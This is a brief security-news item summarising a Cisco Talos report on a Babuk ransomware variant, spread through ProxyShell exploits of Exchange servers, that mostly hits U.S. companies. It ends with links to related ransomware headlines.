Security News > 2021 > November > Cisco Talos reports new variant of Babuk ransomware targeting Exchange servers
A new bad actor called Tortilla is running the campaign, and most affected users are in the U.S. Cisco Talos has a warning out for U.S. companies about a new variant of the Babuk ransomware.
Security researchers Chetan Raghuprasad, Vanja Svajcer and Caitlin Huey describe the new threat in a Talos Intelligence blog post.
The researchers think that the initial infection vector is an exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell.
The.NET executable version of the initial downloader is a modified variant of the EfsPotato exploit with code to download and trigger the next stage.
The Cisco Talos post has details on each phase and tool in the attack.
The researchers note the Babuk builder and its source code were leaked in July and that the Tortilla ransomware actor has been experimenting with different payloads.
News URL
Related news
- Number of Active Ransomware Groups Highest on Record, Cyberint’s Report Finds (source)
- Ransomware hits web hosting servers via vulnerable CyberPanel instances (source)
- Meet Interlock — The new ransomware targeting FreeBSD servers (source)
- Halliburton reports $35 million loss after ransomware attack (source)